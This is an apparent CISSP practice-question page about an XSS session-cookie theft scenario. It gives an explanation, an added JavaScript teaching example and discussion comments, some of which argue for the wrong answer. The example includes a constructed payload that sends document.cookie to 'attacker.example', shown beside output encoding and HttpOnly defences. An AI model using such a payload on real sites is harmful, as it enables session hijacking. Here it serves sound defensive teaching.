
CISSP Exam - Question 29


An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred?

Correct Answer: C

The scenario describes an attacker obtaining a user's session cookie through a script that the user's browser executed when visiting a compromised website. That is the signature of a Cross-Site Scripting (XSS) attack: the attacker injects a malicious script into a page served by the vulnerable site, and because the browser treats the script as coming from that site's origin, the script can read cookies, session tokens, and other data the browser holds for that site and send them to the attacker (a cookie flagged HttpOnly is hidden from script and cannot be stolen this way). SQL injection (SQLi) exploits flaws in how an application builds SQL queries; XML External Entity (XXE) attacks abuse insecurely configured XML parsers and processors; and Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into sending unwanted requests to a web application. CSRF does cause the browser to attach the session cookie to the forged request, but the attacker never reads the cookie itself. None of these other attack types involves executing an attacker-supplied script in the victim's browser to steal session cookies, so XSS is the answer that fits the scenario most precisely.
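The distinction drawn above is easier to see in code. What follows is an added example written for this page, not code from the exam or from any cited source: a server-side rendering function that reflects a query parameter into HTML unescaped (a reflected XSS bug), the same function with output encoding, a constructed cookie-stealing payload of the kind described in the explanation, and the Set-Cookie attributes that keep even a successful script injection from reaching the session cookie. The function names, the `attacker.example` host, the `SESSIONID` cookie name and the payload string are all assumptions made for illustration.

```javascript
// Added example (not from the original page). All names below are hypothetical.

// Constructed payload of the kind the explanation describes: when the browser
// runs it in the vulnerable site's origin, it reads document.cookie and sends
// the value to an attacker-controlled host.
const CONSTRUCTED_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Minimal HTML entity encoding for text placed inside an element body.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the search term is written into the page as-is, so a term that
// contains markup becomes part of the page and is executed by the browser.
function renderSearchPageVulnerable(query) {
  return `<html><body><p>Results for: ${query}</p></body></html>`;
}

// Hardened: the same template with the untrusted value encoded, so the browser
// renders the payload as text rather than as a script element.
function renderSearchPageSafe(query) {
  return `<html><body><p>Results for: ${escapeHtml(query)}</p></body></html>`;
}

// Crude check used only in this example: does the rendered page contain a
// script element? The templates above never emit one themselves, so any hit
// came from the injected input.
function containsInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

// Set-Cookie header for the session cookie. HttpOnly stops document.cookie
// from exposing it, so a script that does run cannot read it; Secure and
// SameSite=Lax are the other attributes a hardened session cookie carries.
function sessionCookieHeader(sessionId, { httpOnly = true } = {}) {
  const attrs = [`SESSIONID=${sessionId}`, 'Path=/', 'Secure', 'SameSite=Lax'];
  if (httpOnly) attrs.push('HttpOnly');
  return attrs.join('; ');
}

// Simulates what document.cookie would return for a set of Set-Cookie headers:
// the browser omits any cookie that carries the HttpOnly attribute.
function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0].trim())
    .join('; ');
}

// Stand-alone demonstration.
function demo() {
  const results = {
    vulnerableExecutesPayload: containsInjectedScript(
      renderSearchPageVulnerable(CONSTRUCTED_PAYLOAD)
    ),
    safeExecutesPayload: containsInjectedScript(renderSearchPageSafe(CONSTRUCTED_PAYLOAD)),
    cookieVisibleToScript: documentCookieView([sessionCookieHeader('abc123', { httpOnly: false })]),
    cookieVisibleWithHttpOnly: documentCookieView([sessionCookieHeader('abc123')]),
  };
  console.log(results);
  return results;
}

demo();
```

The two fixes are independent and both belong in a real deployment: output encoding removes the injection itself, while HttpOnly limits what an injection that slips through can reach. Note the contrast with CSRF: in a CSRF attack the browser attaches the session cookie to a forged request and the cookie is never read by the attacker, whereas the payload above only works because attacker-supplied script is running inside the vulnerable site's origin.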

Discussion

13 comments
Toa
Sep 6, 2023

Answer C https://www.fortinet.com/resources/cyberglossary/cross-site-scripting

Cww1
Sep 6, 2023

It's C. The "stolen session cookie information" part of the question is trying to trick you into picking CSRF.

Eltooth (Option: C)
Oct 27, 2023

C is correct answer. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. https://owasp.org/www-community/attacks/xss/ https://owasp.org/www-community/attacks/csrf

Jamati (Option: C)
Nov 12, 2023

XSS injects a malicious script into a vulnerable website in order to get a user's session cookies when they visit the compromised website. XSRF/CSRF on the other hand only targets the user directly, it does not compromise any website and does not get session cookies.

kandegama (Option: C)
Apr 8, 2024

XSS happens on the client side. CSRF happens on the web server side. Therefore the answer is C.

jackdryan
Apr 23, 2024

C is correct

explorer3 (Option: C)
Oct 13, 2023

Correct answer is C, Cross-site scripting attack. The attacker can compromise the session token by using malicious code or programs running at the client side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and carry out the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it is possible to create specific JavaScript code that will send the cookie to the attacker. https://owasp.org/www-community/attacks/Session_hijacking_attack

Arunlab
Nov 16, 2023

Answer is D. CSRF uses the authentication cookie. Cross-site request forgery (CSRF) is a web application security attack that tricks a web browser into executing an unwanted action in an application to which a user is already logged in. The attack is also known as XSRF, Sea Surf or Session Riding.

ShefAZ (Option: D)
Dec 15, 2024

"browser executed a script upon visiting a compromised website": A Cross-Site Request Forgery (CSRF) attack occurs when a malicious web site, email, blog, instant message, or program tricks an authenticated user's web browser into performing an unwanted action on a trusted site.

franbarpro (Option: C)
Sep 7, 2023

Agree with C. If it is a script (JavaScript) in the browser, it is definitely XSS.

rootic (Option: C)
Oct 28, 2023

Definitely C.

Arunlab
Nov 16, 2023

Ignore my comment. I will go with C

A1nthem (Option: C)
Oct 11, 2024

XSS: `</script>` to load in the browser

HazRic (Option: C)
Mar 5, 2025

As someone who is OSCP, CRT, CRTP and CRTO certified, I can confirm that the correct answer is C. Mic drop!